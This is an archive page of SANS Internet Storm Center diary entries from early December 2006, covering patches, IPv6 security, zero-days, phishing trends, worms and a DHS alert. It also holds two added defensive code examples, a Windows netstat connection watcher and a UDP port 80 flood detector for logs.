ISC Handler on Duty


Published: 2006-12-06

GnuPG new versions-upgrade now

GnuPG.org has released versions 1.4.6 and 2.0.1 of GPG, the popular free PGP replacement to address the vulnerabilities noted in CVE-2006-6235, a code execution vulnerability triggered by a malformed message/file.  You are urged to upgrade as soon as possible.

Announcement: http://lists.gnupg.org/pipermail/gnupg-announce/2006q4/000245.html
GPG home: http://www.gnupg.org


Published: 2006-12-06

IPv6 and Security

For the last two days I have been at an IPv6 conference.  Not knowing much about the protocol (like many of us, my daily troubles lie in the IPv4 space), I was looking forward to learning exactly what the big deal was, and more importantly how it affects security and what the implications for our clients are.  As one of the speakers said, "some security issues will be worse, some better and most of them the same", filling me with hope that I'll still be employed in the IPv6 world.

The first hurdle is to remember that it is just another protocol.  Think of it like IPX, SNA, AppleTalk, DECnet, take your pick.  It is a convenient way of getting traffic from point A to point B.  The main reason for changing to IPv6 is the increase in the number of available addresses.  According to the presentations, IPv4 addresses will run out in the next 6 years or so.

A second hurdle is to remember the difference between end-to-end addressability and end-to-end connectivity.  A number of the presentations saw IPv6 as a way of providing the latter, which tends to scare security people: peer-to-peer processing across firewalls, networks, etc. (I can hear the squeals of protest, "not over my network you don't").  As far as I understand it, IPv6 provides end-to-end addressing, which is different.  Knowing how to get to a device is one thing; being allowed to do so is another.  It should also remove the need for NAT.

Now for the security side of things: IPsec support is mandatory in IPv6 implementations (using it is not).  So if you wish, you can secure communications end to end between two addressable (and reachable) devices.  If you have ever set up a VPN between two different vendors' products you know that it can be a challenge.  The second part of the problem is this: are you comfortable allowing IPsec tunnels through your perimeter, where your IDS and content filters can't see inside them?  BTW I'm not saying the IPsec features are bad, I just think there will be some challenges to overcome.

One of the presenters today mentioned that reconnaissance and malware propagation will be more difficult in the IPv6 world.  There is such a large address space to check that sweeping it would take so long (think several thousand years) that the effort is not worthwhile.  However, IPv6 does rely heavily on two things, DHCP (or stateless autoconfiguration) and DNS: DHCP to allocate addresses and DNS to find things in the network.  That in itself is interesting, as it provides two convenient targets on an IPv6 network.  Randomly scanning for available hosts may not be required, as you may be able to get all the information you need from one of these devices.  I think malware will just take advantage of what is available.

As for other threats there are many that will not change much, if at all.  You can still sniff the network.  Application layer attacks don't change, rogue devices can still be inserted into the network and may even be more difficult to detect. Man in the middle attacks still work.  Flooding, spoofing and a whole host of other attacks are all still possible.

IPv6 networks are already being deployed within organisations and will continue to be.  Connectivity via the Internet will slowly start to appear over the next few years as ISPs and telcos change their infrastructure (there is no real business driver as yet).  In the meantime not many firewalls deal with this protocol sensibly, nor do a number of other security devices such as IDS/IPS.  So there is a fair way to go before the protocol can be used securely.

As a final thought, one of the presentations mentioned that Vista will have IPv6 enabled by default, with some functionality only fully available when IPv6 is used.  This in itself has some implications for us all.  One thing that interests me is how the IPv4/IPv6 combination is handled when a name resolves to both.  In XP, for example, when IPv6 is enabled it has preference: a connection attempt is made using IPv6 first, and once the timeouts are reached an IPv4 request is performed.  This can have a noticeable performance impact.  If someone knows how Vista behaves in this instance I'd be interested to find out.  If it is the same as XP, then I can see a lot of helpdesk calls complaining about slowness of the network.

There is much more to IPv6 than the above, but I'll leave that for another time; I'm still digesting all the information.



ISC Handler on Duty


Published: 2006-12-05

Word Zero-Day, So Sayeth Microsoft

Microsoft released an announcement of a zero-day vulnerability in Microsoft Word.   Read about it here.

Of particular interest, they say:

"Microsoft is investigating new public reports of limited 'zero-day' attacks using a vulnerability in Microsoft Word 2000, Microsoft Word 2002, Microsoft Office Word 2003, Microsoft Word Viewer 2003, Microsoft Word 2004 for Mac, and Microsoft Word 2004 v. X for Mac, as well as Microsoft Works 2004, 2005, and 2006.  In order for this attack to be carried out, a user must first open a malicious Word file attached to an e-mail or otherwise provided to them by an attacker."

Microsoft's advice?  They say, "Do not open or save Word files that you receive from un-trusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted Word file."

Ok... sure.  Thanks.

--Ed Skoudis


Published: 2006-12-05

IBM Tivoli Storage Manager Buffer Overflow Vulns and Patches

Looks like IBM Tivoli Storage Manager has a few buffer overflow vulnerabilities.  Read more about them here, courtesy of Tipping Point.

The money quote:

"These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Storage Manager. Authentication is not required to exploit these vulnerabilities.  The specific flaws are similar and exist in the processing of messages by the Tivoli Storage Manager service, bound on TCP port 1500. "

Patches from IBM described here.

Looks like IBM thinks they cannot be exploited, as they say, "This problem relates to an internal buffer overflow in TSM but IBM does not believe it is possible to exploit this buffer overflow for remote code execution, however, this exposure can be used to crash the TSM server."

Either way... if you use Tivoli, you should analyze this carefully.


Published: 2006-12-05

Fun With Windows Netstat

I've often lamented the fact that Windows does not have a built-in lsof-like tool.  On Linux and UNIX, lsof gives all kinds of details about what various processes are up to.  Sure, we've got the Microsoft Sysinternals Process Monitor tool, which is really cool, but is not built in.  And, of course, Windows doesn't include a built-in sniffer…

One technique that I've been using a lot in incident handling, vulnerability assessment, malware analysis, and other sysadmin work over the last few months involves the traditional, humble netstat tool.  Although netstat is limited, I've found a specific use of it to be tremendously helpful.  Here are some scenarios.

Fellow handler Mike Poor and I were at a client site, and Mike was doing a network scan.  I had one of the client's laptops, on which we could install no additional software.  I wanted to see when Mikey's wide-ranging scan reached my box, which did have an open port.  Here's what I ran:

C:\> netstat -na 1 | find "[Scan_Host_IP_Addr]"

The netstat command, used this way, shows TCP and UDP port activity.  The -n means to list numbers.  The -a indicates that we want all connections and listening ports.  In Windows netstat, the 1 means we want to run every second, repeatedly dumping the output on standard out.  And, we are looking through our output with the find command to see an indication of when Mike's box had accessed ours.  Note that I'm using find here, but another alternative would be the findstr command.  The find command can locate strings nicely, but findstr can process regular expressions.  I believe in using the appropriate tool for the job, and these simple searches work just fine with find.  If you want regexp stuff, use the more powerful findstr command.  Anyway, because the 3-way handshake or an actual connection will likely last more than 1 second, this technique will work.  Sadly, the technique does not work to capture sub-1-second events.  As Mikey continued the scan… Bingo!  We could see with 1-second accuracy when it reached my box.

I've used this technique elsewhere as well.  A gentleman taking the SANS Security 504 class had a dilemma.  He was seeing a weird ICMP Host Unreachable message in his network.  When he looked at the destination address, it was going from his router back to his Domain Controller.  So, his DC was pushing out a packet to a machine that his router couldn't reach.  But, what process on his DC was sending this packet?  On the Domain Controller, we ran:

C:\> netstat -nao 1 | find "[Dest_IP_Addr]"

Here, I've added the -o flag, which makes Windows netstat print the PID.  You can then look up that PID using "wmic process list brief", "tasklist", or, if you insist, Task Manager (yuck!).  Then, you can see what process is emitting that packet, provided that it is using the TCP or UDP stack of Windows to send it, and that it takes at least a second.  Note that netstat also offers the -b flag, which makes it show the EXE and its associated DLLs that are using TCP and UDP ports.  However, I didn't use -b here, because it seriously hurts performance.  For whatever reason, it takes netstat a lot of CPU cycles to get the EXE and DLL info, cycles that we cannot spare on a Domain Controller.  And, running "netstat -naob" every second would be a serious drain on processor resources.

Here's another one.  We were working on an investigation where an evil process would start up, and eventually (not instantly) listen on TCP port 2222.  We wanted to know when it started listening, so we ran:

C:\> netstat -na 1 | find "2222"

And, here's one final one for you.  I was working on an investigation, and we had a process listening on a given TCP port (let's say, for example, it was TCP port 4444).  We wanted to know when the bad guy connected to it.  We ran:

C:\> netstat -na 1 | find "4444" | find "ESTABLISHED"

This will print nothing until the output of netstat includes an established connection on port 4444.  So, with approximately 1-second accuracy, we were able to see when someone connected to the port, knowing that our bad guy had come calling.  Also, this output includes the source IP address connected to the port, a helpful thing in an investigation.

Now, obviously you could do all of this with a sniffer, with more accuracy and detail.  But, netstat is built-in, and these commands are easy and quick to type.

--Ed Skoudis.
Handler on Duty
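As an added example (not Ed Skoudis's code), here is the same one-second netstat loop as a small snapshot-diff watcher: parseNetstat() turns the text that "netstat -nao" prints into records, newConnections() reports the rows that appeared since the previous snapshot, so you get the moment the listener or the ESTABLISHED connection first showed up plus its PID, and the guarded block at the bottom drives it with the real netstat on a Windows host under node. The two snapshots embedded in the code are constructed sample output, not a capture from an investigation.

```javascript
'use strict';
// Added example, not Ed Skoudis's code. The two snapshots are constructed
// sample "netstat -nao" output; the watch() loop only runs on Windows.

// One row of "netstat -nao" output -> { proto, local, remote, state, pid }.
// UDP rows carry no State column, so the PID is taken as the last field.
function parseNetstat(text) {
  const rows = [];
  for (const line of text.split(/\r?\n/)) {
    const f = line.trim().split(/\s+/);
    if (f[0] !== 'TCP' && f[0] !== 'UDP') continue;   // skip banner, header, blanks
    rows.push({
      proto: f[0],
      local: f[1],
      remote: f[2],
      state: f[0] === 'TCP' ? f[3] : '',
      pid: Number(f[f.length - 1]),
    });
  }
  return rows;
}

// Port number from "0.0.0.0:4444" or "[::]:4444".
function portOf(addr) {
  return Number(addr.slice(addr.lastIndexOf(':') + 1));
}

// The diary's two filters: a local port and, optionally, a state
// ("2222" alone, or "4444" plus "ESTABLISHED").
function matching(rows, port, state) {
  return rows.filter(r => portOf(r.local) === port && (!state || r.state === state));
}

// Rows present in `now` but not in `before`: the first snapshot in which the
// handshake or the listener appears, which is what the 1-second loop gives you.
function newConnections(before, now, port, state) {
  const key = r => `${r.proto} ${r.local} ${r.remote} ${r.state}`;
  const seen = new Set(matching(before, port, state).map(key));
  return matching(now, port, state).filter(r => !seen.has(key(r)));
}

// Constructed sample output, one second apart: the bad guy connects to 4444.
const SNAPSHOT_1 = `
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2380
  UDP    0.0.0.0:500            *:*                                    684
`;

const SNAPSHOT_2 = `
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2380
  TCP    10.0.0.5:4444          192.0.2.77:51231       ESTABLISHED     2380
  UDP    0.0.0.0:500            *:*                                    684
`;

// Live use on Windows: poll netstat -nao once a second and print each new
// match with a timestamp and the PID to feed to tasklist /fi "PID eq N".
function watch(port, state, intervalMs = 1000) {
  const { execFileSync } = require('child_process');
  let before = [];
  setInterval(() => {
    const now = parseNetstat(execFileSync('netstat', ['-nao'], { encoding: 'utf8' }));
    for (const r of newConnections(before, now, port, state)) {
      console.log(`${new Date().toISOString()} ${r.proto} ${r.local} <- ${r.remote} ${r.state} PID ${r.pid}`);
    }
    before = now;
  }, intervalMs);
}

if (typeof require !== 'undefined' && require.main === module) {
  if (process.platform === 'win32') {
    watch(Number(process.argv[2] || 4444), process.argv[3] || 'ESTABLISHED');
  } else {
    console.log(newConnections(parseNetstat(SNAPSHOT_1), parseNetstat(SNAPSHOT_2), 4444, 'ESTABLISHED'));
  }
}
```

Diffing snapshots rather than grepping each one is what turns the technique into a log: repeated lines are suppressed and every printed row is a state change with a timestamp, but the one-second sampling limit the diary mentions still applies, so anything shorter than the polling interval can fall between two snapshots.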


Published: 2006-12-04

Is your bank's online security policy making it more of a target for phishers?

This morning in the Handlers' secret room, we were having a discussion about financial institutions and their supposed security policies making them a lucrative target for spamming and phishing.  Our discussion centered around how they attempt authentication and whether this authentication actually increases the likelihood that your account will be compromised. 

One example:
A bank or financial institution implements a security policy that requires you to answer a question in addition to your user id and password.  This sounds great, right? A "two factor" method of identification (really a second something-you-know rather than a second factor, but still).  Well, maybe not...  You see, if you can't answer the question correctly in addition to your correct user id and password, your account gets locked out.  Ok, so now what?  You call the bank and say, darn it all, my account got locked out....  What does the bank say?  Ok, we will reset your password; what email address do you want the new password sent to?  Oh, by the way, the new password email will not come from us.  We have someone else send it.  Hmmmm....  Oh, and by the way, you may want to check your spam filter because the email may get stopped.

Seriously, what are they thinking? 

What do you think?  Does your bank's or financial institution's method of authentication make you a more lucrative target?


Published: 2006-12-04

Speaking of Predictions

Last year in December I posted a diary asking for predictions from our readers about what they thought the New Year would bring. 

Let's take a look at what our readers said:

Predictions 2006

So how did we do?

1) Web Born Worms - Yep, there has definitely been an increase in them.  From MySpace to CNNWarNews we have seen an increase in worms implanted and ready to move at a moment's notice.
2) RSS Malcode - Again, we have indeed seen an increase in RSS exploits.
3) Trojans outpace worms - If you take a look at Symantec, McAfee and other AV software companies, I think you will see that this too has come to pass.  There are more Trojan-esque exploits than actual viruses and worms.  I think the criminal types have figured out that Trojans are more profitable.
4) Voice over IP phishing - Yes - we have indeed seen a few of these this year.
5) Xbot 360 - Hmm - Not sure about this one.  I haven't heard anything about this at least.
6) Cross Site Scripting attacks - Oh yeah, we have indeed seen a few of those.
7) Zero days - We have seen an increase in zero days. 

So I would say our readers did pretty well.  6 out of 7 ain't bad.

So what do you think? What will 2007 hold in store for us?   More of the same, or something new on the horizon?  Let us know.


Published: 2006-12-04

Phishers Don't Like Monday

"Symantec is declaring 2006 as the year that fraud grew up."

That is an interesting opening to the article that discusses the changes that Symantec has witnessed over the last year in regards to phishing and the evolution of the tactics and methods used to attempt to defraud the cyber community.  According to their observations they indicate an increase in VOIP and SMS targets. 

Symantec's observation is that the bad guys like 3-day weekends as well and take a break from their life of crime.  They also indicate that Mondays are usually the quietest days for new phishing emails and Tuesday they ramp back up.  Hmm.  Interesting; guess I will have to pay closer attention to the spam in my filter.

Vnu Article


Published: 2006-12-04

McAfee's Top 10 Predictions for 2007

McAfee predicts that malware hidden inside Video Files will be the item plaguing computer users this coming year. 

According to McAfee,  "The malware phenomenon is fuelled by a growing online market for identity theft, spam and adware. This is prompting criminals to more closely mimic the processes that have been adopted by legitimate software developers such as testing and quality assurance procedures, the security vendor observed."

With the recent discovery of the "Realor worm", which they indicate is just the first of many "movie Trojans", they may be on to something.  Unfortunately the bad guys will do whatever it takes to make money. 

To see the other items on their list of top 10 take a look at:

Viruses coming to a screen near you.


Published: 2006-12-04

New Hacker Challenge

Hey, challenge fans!  To close out the year, I've posted a Christmas-themed hacker challenge, this one based on the movie A Christmas Story.  You remember that one... with the Messy Marvin kid, the interesting lamp, and the Red Ryder BB gun.  In this challenge, you get to help Ralphie explore his Old Man's network, trying to retrieve a copy of his parents' Christmas gift list.  But, be careful, or else you'll hack your eye out!  Entries are due by December 22, when we'll award three winners a copy of my book.

--Ed Skoudis


Published: 2006-12-02

Phishing and Spamming via IM (SPIM)

Our reader Robert shared a case with us in which a malicious file was detected when one of his users clicked on a link that arrived via MSN Messenger. The malicious file is identified as MSNMaker or Licat.gen.

It is becoming common for attackers to hijack IM for phishing attempts. Most people are now aware of phishing through email and smart enough not to fall into the trap, but using IM to trick people is still not as widely known. You should not blindly trust links received over IM, even if the link comes from a friend. Such links could be part of an IM worm or bait for a phishing scam.


Published: 2006-12-02

MySpace QuickTime Worm

Juha-Matti has sent us some information regarding malicious code spreading on the MySpace network using JavaScript support within Apple's embedded QuickTime player. Websense has also confirmed this.

Extracted from Websense writeup:

Once a user's MySpace profile is infected (by viewing a malicious embedded QuickTime video), that profile is modified in two ways. The links in the user's page are replaced with links to a phishing site, and a copy of the malicious QuickTime video is embedded into the user's site. Any other users who visit this newly-infected profile may have their own profile infected as well.

An infected profile can be identified by the presence of an empty QuickTime video or modified links in the MySpace header section, or both.

More details:


Published: 2006-12-01

404dnserror Adware

Our reader Tom sent us a note about a site called "404dnserror/dot/com" (DO NOT VISIT).

A user of his was infected with some spyware/adware. It kept redirecting them to the '404dnserror' page. The page looks like a generic server error, but also advertises an anti-spyware tool in the form of an ActiveX-like installer toolbar at the top of the page. To save you the risk of exposing yourself to the site, I included a screen shot below (click on the image to see the full page).

It's probably safe to block/monitor access to this domain.


Published: 2006-12-01

New Data Retention Rules Effective Today

This one hit me a bit by surprise. A couple of readers wrote about it asking for advice. Our reader Steve found a good authoritative source at LexisNexis.
I am not a lawyer, and the article doesn't exactly provide anything new to me. As far as I know, electronic evidence like e-mail archives has been "fair game" for discovery all along, and as a sysadmin you could get into trouble for deleting any archives after being asked not to do so.

You may just want to send the link to your corporate lawyer and have them figure out if any policies need to be changed. This should only affect US based corporations.


Published: 2006-12-01

Port 80 UDP Malware

Our reader Warren informed us that his office in China was infected by a rather nasty piece of malware. It flooded the network with UDP traffic on port 80 and was not recognized by any anti-virus tool. A single infected host sent 100 UDP packets / second.

Couple more hints that may help you identify this threat:

- The UDP port 80 traffic was directed at
- The file name used by the malware is p2psvr.exe (sorry, the binary was not preserved in the cleanup :-( ).
- the machine was also infected with PR_LOOKED.lF (according to Trend Micro).

I assume that the malware attempts to sneak past lazy firewall rules that allow port 80 tcp and udp outbound. The target does not appear to be a "special" host, but a DDoS is possible as a motive for the UDP traffic.
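The one hard indicator given above is a rate: a single infected host pushing about 100 UDP packets per second at port 80, through rules that let "port 80" out regardless of protocol. The following is an added example, not code from the diary or from any reader, of how to pick such hosts out of ordinary flow-style logs. The log line layout (`<epoch_seconds> <src_ip> <dst_ip> <proto> <dst_port>`), the field names and the sample records are all assumptions constructed for the example; the addresses are RFC 5737 documentation ranges, not the real target.

```python
"""Flag internal hosts that flood UDP/80 at a high per-second packet rate.

Added example (not from the diary). Scans constructed, flow-style log lines of
the assumed form "<epoch_seconds> <src_ip> <dst_ip> <proto> <dst_port>" and
reports every source whose UDP/80 packet count in any single second reaches a
threshold. The layout and the sample data below are assumptions.
"""
from collections import defaultdict


def parse_line(line):
    """Return (second, src, dst, proto, dport), or None for a malformed line."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, src, dst, proto, dport = parts
    try:
        return int(float(ts)), src, dst, proto.lower(), int(dport)
    except ValueError:
        return None


def udp80_rates(lines):
    """Count UDP packets to destination port 80 per (source, second)."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip unparsable records rather than abort the scan
        second, src, _dst, proto, dport = rec
        if proto == "udp" and dport == 80:
            counts[(src, second)] += 1
    return counts


def find_udp80_flooders(lines, pps_threshold=50):
    """Return {src: peak_pps} for sources that hit the threshold in some second.

    TCP/80 is deliberately ignored: ordinary web browsing must not trip this,
    only the UDP traffic the diary describes.
    """
    peak = defaultdict(int)
    for (src, _second), n in udp80_rates(lines).items():
        if n > peak[src]:
            peak[src] = n
    return {src: pps for src, pps in peak.items() if pps >= pps_threshold}


# Constructed sample: one host emits 100 UDP/80 packets within a single second
# (the rate reported in the diary); a second host does normal TCP/80 browsing
# plus two stray UDP/80 packets, which should stay under the default threshold.
SAMPLE_LOG = (
    ["1164960000 192.0.2.10 198.51.100.7 udp 80"] * 100
    + ["1164960000 192.0.2.20 198.51.100.7 tcp 80"] * 30
    + ["1164960000 192.0.2.20 198.51.100.7 udp 80"] * 2
    + ["garbage line"]
)

if __name__ == "__main__":
    for src, pps in find_udp80_flooders(SAMPLE_LOG).items():
        print(f"{src}: peak {pps} UDP/80 packets/second")
```

Run against real exports, the threshold is the only knob: a few legitimate UDP/80 packets per second from one host are not unusual, but a sustained three-digit rate from a single workstation to one destination matches the behaviour described above and is worth pulling the machine for analysis (and, per the reminder below, keeping the binary).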

Reminder: if you come across odd infections like that, please preserve the malware for analysis.


Published: 2006-12-01

Technical Mujahid Magazine

As Johannes pointed out in the earlier diary, an alert was issued a few hours ago concerning potential attacks aimed at banking and financial web sites.  DHS and others are in agreement that this is not a big deal and that the warning was issued as a prudent measure.  While doing some research on this issue, we found an announcement that a new magazine was available online.  Details are at the Middle East Media Research Center and the Search for International Terrorist Entities.  I don't speak or read Arabic, Farsi, or Urdu, but if one of our readers can take a look at it and provide a quick translation that would be great!  We suspect that there might be a loose connection between the publication of the magazine and the alert.

For sake of completeness, here is the link to the SITE discussion about the original posting that set in motion this chain of events. 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-01

US DHS banking alert

A number of major news sites picked up on an alert issued by the US Department of Homeland Security (DHS), suggesting a major pending cyber attack by al Qaeda against US banking interests. The news coverage suggests that the attack will begin tomorrow and last until year's end.

The entire issue is probably best summarized by a quote from a DHS spokesperson, published on CNN.com:

"There is no information to corroborate this aspirational threat. As a routine matter and out of an abundance of caution, US-CERT issued the situational awareness report to industry stakeholders,"

My short take on it: Make sure you follow best practices and keep your guard up. It's probably not going to be Al Qaeda, but someone will probe your defenses tomorrow as they did today. And whatever helps against them will help if Al Qaeda should launch a cyber attack after all.

The Financial Services Information Sharing and Analysis Center (FS/ISAC) is currently posting a "Low Risk of Cyber Attacks" on its web site.